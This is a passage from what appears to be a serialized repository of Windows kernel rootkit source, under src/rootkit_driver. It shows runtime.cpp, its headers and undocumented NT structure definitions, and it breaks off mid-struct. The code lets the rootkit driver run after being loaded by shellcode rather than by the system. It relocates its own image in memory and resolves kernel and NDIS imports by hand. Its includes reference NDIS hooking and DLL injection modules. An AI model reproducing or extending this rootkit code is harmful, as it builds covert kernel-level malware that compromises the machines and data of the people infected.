"\r\n\r\n\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\r\n" }, { "path": "src/rootkit_driver/runtime.cpp", "content": "#include \"stdafx.h\"\r\n#include \"../common/shellcode2_struct.h\"\r\n\r\n#pragma alloc_text(INIT, my_strlen)\r\n#pragma alloc_text(INIT, my_strcmp)\r\n#pragma alloc_text(INIT, my_strcpy)\r\n#pragma alloc_text(INIT, my_strlwr)\r\n#pragma alloc_text(INIT, chrlwr_w)\r\n#pragma alloc_text(INIT, EqualUnicodeString_r)\r\n#pragma alloc_text(INIT, RuntimeGetExportAddress)\r\n#pragma alloc_text(INIT, RuntimeGetKernelModuleBase)\r\n#pragma alloc_text(INIT, RuntimeProcessImports)\r\n#pragma alloc_text(INIT, RuntimeInitialize)\r\n\r\n#define MAX_IMAGE_NAME_LEN 255\r\n\r\nPVOID m_KernelBase = NULL, m_DriverBase = NULL;\r\n//--------------------------------------------------------------------------------------\r\n/**\r\n * Implementations of some standard C library functions.\r\n */\r\n\r\nsize_t my_strlen(const char *str)\r\n{\r\n if (str)\r\n {\r\n size_t i = 0;\r\n\r\n for (; str[i] != NULL; i++);\r\n\r\n return i; \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nint my_strcmp(const char *str_1, const char *str_2)\r\n{\r\n size_t len_1 = my_strlen(str_1), len_2 = my_strlen(str_2);\r\n\r\n if (len_1 != len_2)\r\n {\r\n return 1;\r\n }\r\n\r\n for (size_t i = 0; i < len_1; i++)\r\n {\r\n if (str_1[i] != str_2[i])\r\n {\r\n return 1;\r\n }\r\n }\r\n\r\n return 0;\r\n}\r\n\r\nchar *my_strcpy(char *str_1, const char *str_2)\r\n{\r\n size_t len = my_strlen(str_2) + 1;\r\n\r\n for (size_t i = 0; i < len; i++)\r\n {\r\n str_1[i] = str_2[i];\r\n }\r\n\r\n return str_1;\r\n}\r\n\r\nchar *my_strlwr(char *str)\r\n{\r\n char *pos = str;\r\n\r\n for (; str <= (pos + my_strlen(pos)); str++)\r\n {\t\t\r\n if ((*str >= 'A') && (*str <= 'Z')) \r\n {\r\n *str = *str + ('a'-'A');\r\n }\r\n }\r\n\r\n return pos;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nwchar_t chrlwr_w(wchar_t chr)\r\n{\r\n if ((chr >= 'A') && (chr <= 'Z')) \r\n {\r\n return chr + ('a'-'A');\r\n }\r\n\r\n return chr;\r\n}\r\n\r\nBOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive)\r\n{\r\n USHORT CmpLen = min(Str1->Length, Str2->Length) / sizeof(WCHAR);\r\n\r\n // compare unicode strings from the end of the buffers\r\n for (USHORT i = 1; i < CmpLen; i++)\r\n {\r\n WCHAR Chr1 = Str1->Buffer[Str1->Length / sizeof(WCHAR) - i], \r\n Chr2 = Str2->Buffer[Str2->Length / sizeof(WCHAR) - i];\r\n\r\n if (CaseInSensitive)\r\n {\r\n Chr1 = chrlwr_w(Chr1);\r\n Chr2 = chrlwr_w(Chr2);\r\n }\r\n\r\n if (Chr1 != Chr2)\r\n {\r\n return FALSE;\r\n }\r\n }\r\n\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName)\r\n{\r\n PIMAGE_EXPORT_DIRECTORY pExport = NULL;\r\n\r\n PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n {\r\n // 32-bit image\r\n if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)\r\n {\r\n pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image,\r\n pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n } \r\n } \r\n else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n {\r\n // 64-bit image\r\n PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)\r\n {\r\n pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image,\r\n pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n }\r\n }\r\n else\r\n {\r\n return NULL;\r\n }\r\n\r\n if (pExport)\r\n {\r\n PULONG AddressOfFunctions = (PULONG)RVATOVA(Image, pExport->AddressOfFunctions);\r\n PSHORT AddrOfOrdinals = (PSHORT)RVATOVA(Image, pExport->AddressOfNameOrdinals);\r\n PULONG AddressOfNames = (PULONG)RVATOVA(Image, pExport->AddressOfNames);\r\n\r\n // enumerate exports\r\n for (ULONG i = 0; i < pExport->NumberOfFunctions; i++)\r\n {\r\n if (!my_strcmp((char *)RVATOVA(Image, AddressOfNames[i]), lpszFunctionName))\r\n {\r\n return RVATOVA(Image, AddressOfFunctions[AddrOfOrdinals[i]]);\r\n }\r\n }\r\n } \r\n\r\n return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN RuntimeProcessImports(PVOID Image, char *ImportedModuleName, PVOID ImportedModuleBase)\r\n{ \r\n PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n PIMAGE_IMPORT_DESCRIPTOR pImport = NULL;\r\n\r\n if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n {\r\n // 32-bit image\r\n if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)\r\n {\r\n pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image,\r\n pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\r\n }\r\n } \r\n else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n {\r\n // 64-bit image\r\n PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)\r\n {\r\n pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image,\r\n pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\r\n }\r\n }\r\n else\r\n {\r\n return FALSE;\r\n }\r\n\r\n if (pImport)\r\n {\r\n // enumerate import modules\r\n while (pImport->Name != 0)\r\n {\r\n char szName[MAX_IMAGE_NAME_LEN];\r\n my_strcpy(szName, (char *)RVATOVA(Image, pImport->Name));\r\n \r\n if (my_strcmp(my_strlwr(szName), ImportedModuleName))\r\n {\r\n // this routine can process only exports from the specified module\r\n goto skip_module;\r\n }\r\n\r\n#ifdef _X86_\r\n \r\n // process thunk data for 32-bit pointers\r\n PIMAGE_THUNK_DATA32 pThunk = (PIMAGE_THUNK_DATA32)RVATOVA(Image, pImport->FirstThunk);\r\n\r\n#elif _AMD64_ \r\n\r\n // process thunk data for 64-bit pointers\r\n PIMAGE_THUNK_DATA64 pThunk = (PIMAGE_THUNK_DATA64)RVATOVA(Image, pImport->FirstThunk);\r\n#endif\r\n // enumerate functions of the current module\r\n while (pThunk->u1.Ordinal != 0)\r\n {\r\n PIMAGE_IMPORT_BY_NAME pName = (PIMAGE_IMPORT_BY_NAME)RVATOVA(Image, pThunk->u1.AddressOfData);\r\n char *lpszFuncName = (char *)&pName->Name;\r\n \r\n PVOID FuncAddr = RuntimeGetExportAddress(ImportedModuleBase, lpszFuncName);\r\n if (FuncAddr == NULL)\r\n {\r\n return FALSE;\r\n }\r\n\r\n *(PVOID *)pThunk = FuncAddr;\r\n pThunk += 1;\r\n }\r\n\r\nskip_module:\r\n\r\n pImport += 1;\r\n }\r\n } \r\n\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase)\r\n{\r\n PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n PIMAGE_BASE_RELOCATION pRelocation = NULL;\r\n ULONG RelocationSize = 0; \r\n ULONGLONG OldBase = 0;\r\n\r\n if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n {\r\n // 32-bit image\r\n if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n {\r\n pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image,\r\n pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\r\n RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n }\r\n\r\n OldBase = pHeaders32->OptionalHeader.ImageBase;\r\n } \r\n else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n {\r\n // 64-bit image\r\n PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n {\r\n pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image,\r\n pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\r\n RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n }\r\n\r\n OldBase = pHeaders64->OptionalHeader.ImageBase;\r\n }\r\n else\r\n {\r\n return FALSE;\r\n }\r\n\r\n if (pRelocation)\r\n {\r\n ULONG Size = 0;\r\n\r\n // enumerate relocation pages\r\n while (RelocationSize > Size && pRelocation->SizeOfBlock)\r\n { \r\n ULONG Number = (pRelocation->SizeOfBlock - 8) / 2;\r\n PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8); \r\n\r\n // enumerate relocation offsets for the current page\r\n for (ULONG i = 0; i < Number; i++)\r\n {\r\n if (Rel[i] > 0)\r\n {\r\n USHORT Type = (Rel[i] & 0xF000) >> 12;\r\n\r\n // check for supporting type\r\n if (Type != IMAGE_REL_BASED_HIGHLOW &&\r\n Type != IMAGE_REL_BASED_DIR64)\r\n {\r\n return FALSE;\r\n }\r\n#ifdef _X86_\r\n *(PULONG)(RVATOVA(Image, pRelocation->VirtualAddress + \r\n (Rel[i] & 0x0FFF))) += (ULONG)((ULONGLONG)NewBase - OldBase);\r\n#elif _AMD64_\r\n *(PULONGLONG)(RVATOVA(Image, pRelocation->VirtualAddress + \r\n (Rel[i] & 0x0FFF))) += (ULONGLONG)NewBase - OldBase;\r\n#endif\r\n }\r\n }\r\n\r\n pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock);\r\n Size += pRelocation->SizeOfBlock; \r\n }\r\n }\r\n\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass)\r\n{\r\n NTSTATUS ns = STATUS_SUCCESS;\r\n ULONG Size = 0x100;\r\n PVOID Info = NULL;\r\n\r\n while (true) \r\n { \r\n // allocate memory for the system information\r\n if ((Info = ExAllocatePool(NonPagedPool, Size)) == NULL) \r\n {\r\n DbgMsg(\"ExAllocatePool() fails\\n\");\r\n return NULL;\r\n }\r\n\r\n ULONG RetSize = 0;\r\n ns = ZwQuerySystemInformation(InfoClass, Info, Size, &RetSize);\r\n if (ns == STATUS_INFO_LENGTH_MISMATCH)\r\n { \r\n ExFreePool(Info);\r\n Info = NULL;\r\n\r\n if (RetSize > 0)\r\n {\r\n // need more memory\r\n Size = RetSize + 0x100;\r\n } \r\n else\r\n {\r\n break;\r\n }\r\n }\r\n else\r\n {\r\n break; \r\n }\r\n }\r\n\r\n if (!NT_SUCCESS(ns))\r\n {\r\n DbgMsg(\"ZwQuerySystemInformation() fails; status: 0x%.8x\\n\", ns);\r\n\r\n if (Info)\r\n {\r\n // cleanup on error\r\n ExFreePool(Info);\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\n return Info;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID RuntimeGetKernelModuleBase(char *ModuleName)\r\n{\r\n PVOID pModuleBase = NULL;\r\n UNICODE_STRING usCommonHalName, usCommonNtName;\r\n\r\n RtlInitUnicodeString(&usCommonHalName, L\"hal.dll\");\r\n RtlInitUnicodeString(&usCommonNtName, L\"ntoskrnl.exe\");\r\n\r\n #define HAL_NAMES_NUM 6\r\n wchar_t *wcHalNames[] = \r\n {\r\n L\"hal.dll\", // Non-ACPI PIC HAL \r\n L\"halacpi.dll\", // ACPI PIC HAL\r\n L\"halapic.dll\", // Non-ACPI APIC UP HAL\r\n L\"halmps.dll\", // Non-ACPI APIC MP HAL\r\n L\"halaacpi.dll\", // ACPI APIC UP HAL\r\n L\"halmacpi.dll\" // ACPI APIC MP HAL\r\n };\r\n\r\n #define NT_NAMES_NUM 4\r\n wchar_t *wcNtNames[] = \r\n {\r\n L\"ntoskrnl.exe\", // UP\r\n L\"ntkrnlpa.exe\", // UP PAE\r\n L\"ntkrnlmp.exe\", // MP\r\n L\"ntkrpamp.exe\" // MP PAE\r\n };\r\n\r\n PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation);\r\n if (Info)\r\n {\r\n ANSI_STRING asModuleName;\r\n UNICODE_STRING usModuleName;\r\n\r\n RtlInitAnsiString(&asModuleName, ModuleName);\r\n\r\n NTSTATUS ns = RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE);\r\n if (NT_SUCCESS(ns))\r\n {\r\n for (ULONG i = 0; i < Info->NumberOfModules; i++)\r\n {\r\n ANSI_STRING asEnumModuleName;\r\n UNICODE_STRING usEnumModuleName;\r\n\r\n RtlInitAnsiString(\r\n &asEnumModuleName, \r\n (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName\r\n );\r\n\r\n NTSTATUS ns = RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE);\r\n if (NT_SUCCESS(ns))\r\n { \r\n if (RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE))\r\n {\r\n // hal.dll passed as module name\r\n for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++)\r\n {\r\n UNICODE_STRING usHalName;\r\n RtlInitUnicodeString(&usHalName, wcHalNames[i_m]);\r\n\r\n // compare module name from list with known HAL module name\r\n if (RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE))\r\n {\r\n pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n break;\r\n }\r\n }\r\n }\r\n else if (RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE))\r\n {\r\n // ntoskrnl.exe passed as module name\r\n for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++)\r\n {\r\n UNICODE_STRING usNtName;\r\n RtlInitUnicodeString(&usNtName, wcNtNames[i_m]);\r\n\r\n // compare module name from list with known kernel module name\r\n if (RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE))\r\n {\r\n pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n break;\r\n }\r\n }\r\n }\r\n else if (RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE))\r\n {\r\n pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n }\r\n\r\n RtlFreeUnicodeString(&usEnumModuleName);\r\n\r\n if (pModuleBase)\r\n {\r\n // module is found\r\n break;\r\n }\r\n } \r\n } \r\n\r\n RtlFreeUnicodeString(&usModuleName);\r\n } \r\n\r\n ExFreePool(Info);\r\n }\r\n\r\n return pModuleBase;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN RuntimeInitialize(\r\n PDRIVER_OBJECT DriverObject,\r\n PUNICODE_STRING RegistryPath)\r\n{\r\n if (DriverObject == NULL)\r\n {\r\n /**\r\n * Driver has been loaded by shellcode.\r\n * RegistryPath - pointer to the SC_PARAMS\r\n */\r\n\r\n PSC_PARAMS ShellcodeParams = (PSC_PARAMS)RegistryPath; \r\n\r\n // parse image relocations\r\n if (!RuntimeProcessRelocs(\r\n ShellcodeParams->rootkit_base, \r\n ShellcodeParams->rootkit_base))\r\n {\r\n return FALSE;\r\n }\r\n\r\n /*\r\n Safe to use global variables here.\r\n */\r\n\r\n m_KernelBase = ShellcodeParams->kernel_base;\r\n m_DriverBase = ShellcodeParams->rootkit_base; \r\n\r\n // parse image imports (kernel) \r\n if (!RuntimeProcessImports(\r\n ShellcodeParams->rootkit_base,\r\n \"ntoskrnl.exe\", ShellcodeParams->kernel_base))\r\n {\r\n return FALSE;\r\n }\r\n\r\n /*\r\n Safe to use kernel imports here.\r\n */\r\n\r\n DbgMsg(__FUNCTION__\"(): Kernel base is \"IFMT\"\\n\", m_KernelBase);\r\n\r\n PVOID NdisBase = RuntimeGetKernelModuleBase(\"ndis.sys\");\r\n if (NdisBase)\r\n {\r\n DbgMsg(__FUNCTION__\"(): NDIS base is \"IFMT\"\\n\", NdisBase);\r\n\r\n // parse image imports (NDIS)\r\n if (!RuntimeProcessImports(\r\n ShellcodeParams->rootkit_base,\r\n \"ndis.sys\", NdisBase))\r\n {\r\n return FALSE;\r\n }\r\n } \r\n else\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Unable to locate NDIS\\n\");\r\n return FALSE;\r\n }\r\n\r\n /*\r\n Safe to use all others imports here.\r\n */\r\n }\r\n\r\n // driver has been loaded as usual\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n\r\n" }, { "path": "src/rootkit_driver/runtime.h", "content": "\r\nextern \"C\"\r\n{\r\n size_t my_strlen(const char *str);\r\n int my_strcmp(const char *str_1, const char *str_2);\r\n char *my_strcpy(char *str_1, const char *str_2);\r\n char *my_strlwr(char *str);\r\n\r\n wchar_t chrlwr_w(wchar_t chr);\r\n BOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive);\r\n\r\n PVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass);\r\n PVOID RuntimeGetKernelModuleBase(char *ModuleName);\r\n PVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName);\r\n BOOLEAN RuntimeProcessImports(PVOID Image, PVOID KernelAddress);\r\n BOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase);\r\n\r\n BOOLEAN RuntimeInitialize(\r\n PDRIVER_OBJECT DriverObject,\r\n PUNICODE_STRING RegistryPath\r\n );\r\n}\r\n" }, { "path": "src/rootkit_driver/stdafx.h", "content": "#pragma warning(disable: 4200)\r\n\r\nextern \"C\"\r\n{\r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \"undocnt.h\"\r\n}\r\n\r\n#include \"debug.h\"\r\n#include \"runtime.h\"\r\n#include \"ndis_hook.h\"\r\n#include \"network.h\"\r\n#include \"rootkit_driver.h\"\r\n#include \"dll_inject.h\"\r\n\r\n#include \"../common/common.h\"\r\n#include \"../rootkit_driver_config.h\"\r\n" }, { "path": "src/rootkit_driver/undocnt.h", "content": "\r\n// ********************************************************\r\n// some user-mode structures\r\n\r\ntypedef struct _LDR_DATA_TABLE_ENTRY\r\n{\r\n LIST_ENTRY InLoadOrderModuleList;\r\n LIST_ENTRY InMemoryOrderModuleList;\r\n LIST_ENTRY InInitializationOrderModuleList;\r\n PVOID DllBase;\r\n PVOID EntryPoint;\r\n ULONG SizeOfImage;\r\n UNICODE_STRING FullDllName;\r\n UNICODE_STRING BaseDllName;\r\n ULONG Flags;\r\n USHORT LoadCount;\r\n USHORT TlsIndex;\r\n LIST_ENTRY HashLinks;\r\n PVOID SectionPointer;\r\n ULONG CheckSum;\r\n ULONG TimeDateStamp;\r\n\r\n} LDR_DATA_TABLE_ENTRY, \r\n*PLDR_DATA_TABLE_ENTRY;\r\n\r\ntypedef struct _PEB_LDR_DATA \r\n{\r\n ULONG Length;\r\n BOOLEAN Initialized;\r\n PVOID SsHandle;\r\n LIST_ENTRY ModuleListLoadOrder;\r\n LIST_ENTRY ModuleListMemoryOrder;\r\n LIST_ENTRY ModuleListInitOrder;\r\n\r\n} PEB_LDR_DATA, \r\n*PPEB_LDR_DATA;\r\n\r\n// ********************************************************\r\n\r\ntypedef struct SERVICE_DESCRIPTOR_ENTRY\r\n{\r\n PVOID\t*ServiceTableBase;\r\n PULONG\tServiceCounterTableBase;\r\n ULONG\tNumberOfServices;\r\n PUCHAR\tParamTableBase;\r\n\r\n} SERVICE_DESCRIPTOR_ENTRY,\r\n*PSERVICE_DESCRIPTOR_ENTRY;\r\n\r\ntypedef struct _SERVICE_DESCRIPTOR_TABLE \r\n{\r\n SERVICE_DESCRIPTOR_ENTRY Entry[2];\r\n\r\n} SERVICE_DESCRIPTOR_TABLE,\r\n*PSERVICE_DESCRIPTOR_TABLE; \r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS \r\n{\r\n SystemBasicInformation,\r\n SystemProcessorInformation, // obsolete...delete\r\n SystemPerformanceInformation,\r\n SystemTimeOfDayInformation,\r\n SystemPathInformation,\r\n SystemProcessInformation,\r\n SystemCallCountInformation,\r\n SystemDeviceInformation,\r\n SystemProcessorPerformanceInformation,\r\n SystemFlagsInformation,\r\n SystemCallTimeInformation,\r\n SystemModuleInformation,\r\n SystemLocksInformation,\r\n SystemStackTraceInformation,\r\n SystemPagedPoolInformation,\r\n SystemNonPagedPoolInformation,\r\n SystemHandleInformation,\r\n SystemObjectInformation,\r\n SystemPageFileInformation,\r\n SystemVdmInstemulInformation,\r\n SystemVdmBopInformation,\r\n SystemFileCacheInformation,\r\n SystemPoolTagInformation,\r\n SystemInterruptInformation,\r\n SystemDpcBehaviorInformation,\r\n SystemFullMemoryInformation,\r\n SystemLoadGdiDriverInformation,\r\n SystemUnloadGdiDriverInformation,\r\n SystemTimeAdjustmentInformation,\r\n SystemSummaryMemoryInformation,\r\n SystemMirrorMemoryInformation,\r\n SystemPerformanceTraceInformation,\r\n SystemObsolete0,\r\n SystemExceptionInformation,\r\n SystemCrashDumpStateInformation,\r\n SystemKernelDebuggerInformation,\r\n SystemContextSwitchInformation,\r\n SystemRegistryQuotaInformation,\r\n SystemExtendServiceTableInformation,\r\n SystemPrioritySeperation,\r\n SystemVerifierAddDriverInformation,\r\n SystemVerifierRemoveDriverInformation,\r\n SystemProcessorIdleInformation,\r\n SystemLegacyDriverInformation,\r\n SystemCurrentTimeZoneInformation,\r\n SystemLookasideInformation,\r\n SystemTimeSlipNotification,\r\n SystemSessionCreate,\r\n SystemSessionDetach,\r\n SystemSessionInformation,\r\n SystemRangeStartInformation,\r\n SystemVerifierInformation,\r\n SystemVerifierThunkExtend,\r\n SystemSessionProcessInformation,\r\n SystemLoadGdiDriverInSystemSpace,\r\n SystemNumaProcessorMap,\r\n SystemPrefetcherInformation,\r\n SystemExtendedProcessInformation,\r\n SystemRecommendedSharedDataAlignment,\r\n SystemComPlusPackage,\r\n SystemNumaAvailableMemory,\r\n SystemProcessorPowerInformation,\r\n SystemEmulationBasicInformation,\r\n SystemEmulationProcessorInformation,\r\n SystemExtendedHandleInformation,\r\n SystemLostDelayedWriteInformation,\r\n SystemBigPoolInformation,\r\n SystemSessionPoolTagInformation,\r\n SystemSessionMappedViewInformation,\r\n SystemHotpatchInformation,\r\n SystemObjectSecurityMode,\r\n SystemWatchdogTimerHandler,\r\n SystemWatchdogTimerInformation,\r\n SystemLogicalProcessorInformation,\r\n SystemWow64SharedInformation,\r\n SystemRegisterFirmwareTableInformationHandler,\r\n SystemFirmwareTableInformation,\r\n SystemModuleInformationEx,\r\n SystemVerifierTriageInformation,\r\n SystemSuperfetchInformation,\r\n SystemMemoryListInformation,\r\n SystemFileCacheInformationEx,\r\n MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum\r\n \r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION \r\n{\r\n HANDLE Section; // Not filled in\r\n PVOID MappedBase;\r\n PVOID ImageBase;\r\n ULONG ImageSize;\r\n ULONG Flags;\r\n USHORT LoadOrderIndex;\r\n USHORT InitOrderIndex;\r\n USHORT LoadCount;\r\n USHORT OffsetToFileName;\r\n UCHAR FullPathName[ 256 ];\r\n \r\n} RTL_PROCESS_MODULE_INFORMATION, \r\n*PRTL_PROCESS_MODULE_INFORMATION;\r\n\r\ntypedef struct _RTL_PROCESS_MODULES \r\n{\r\n ULONG NumberOfModules;\r\n RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];\r\n \r\n} RTL_PROCESS_MODULES, \r\n*PRTL_PROCESS_MODULES;\r\n\r\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO \r\n{\r\n USHORT UniqueProcessId;\r\n USHORT CreatorBackTraceIndex;\r\n UCHAR ObjectTypeIndex;\r\n UCHAR HandleAttributes;\r\n USHORT HandleValue;\r\n PVOID Object;\r\n ULONG GrantedAccess;\r\n\r\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, \r\n*PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION \r\n{\r\n ULONG NumberOfHandles;\r\n SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ];\r\n\r\n} SYSTEM_HANDLE_INFORMATION, \r\n*PSYSTEM_HANDLE_INFORMATION;\r\n\r\ntypedef struct _FILE_DIRECTORY_INFORMATION\r\n{\r\n ULONG NextEntryOffset;\r\n ULONG FileIndex;\r\n LARGE_INTEGER CreationTime;\r\n LARGE_INTEGER LastAccessTime;\r\n LARGE_INTEGER LastWriteTime;\r\n LARGE_INTEGER ChangeTime;\r\n LARGE_INTEGER EndOfFile;\r\n LARGE_INTEGER AllocationSize;\r\n ULONG FileAttributes;\r\n ULONG FileNameLength;\r\n WCHAR FileName[1];\r\n\r\n} FILE_DIRECTORY_INFORMATION, \r\n*PFILE_DIRECTORY_INFORMATION;\r\n\r\ntypedef struct _FILE_FULL_DIRECTORY_INFORMATION\r\n{\r\n ULONG NextEntryOffset;\r\n ULONG FileIndex;\r\n LARGE_INTEGER CreationTime;\r\n LARGE_INTEGER LastAccessTime;\r\n LARGE_INTEGER LastWriteTime;\r\n LARGE_INTEGER ChangeTime;\r\n LARGE_INTEGER EndOfFile;\r\n LARGE_INTEGER AllocationSize;\r\n ULONG FileAttributes;\r\n ULONG FileNameLength;\r\n ULONG EaSize;\r\n WCHAR FileName[1];\r\n\r\n} FILE_FULL_DIRECTORY_INFORMATION, \r\n*PFILE_FULL_DIRECTORY_INFORMATION;\r\n\r\ntypedef struct _FILE_BOTH_DIRECTORY_INFORMATION \r\n{\r\n ULONG NextEntryOffset;\r\n ULONG Unknown;\r\n LARGE_INTEGER CreationTime;\r\n LARGE_INTEGER LastAccessTime;\r\n LARGE_INTEGER LastWriteTime;\r\n LARGE_INTEGER ChangeTime;\r\n LARGE_INTEGER EndOfFile;\r\n LARGE_INTEGER 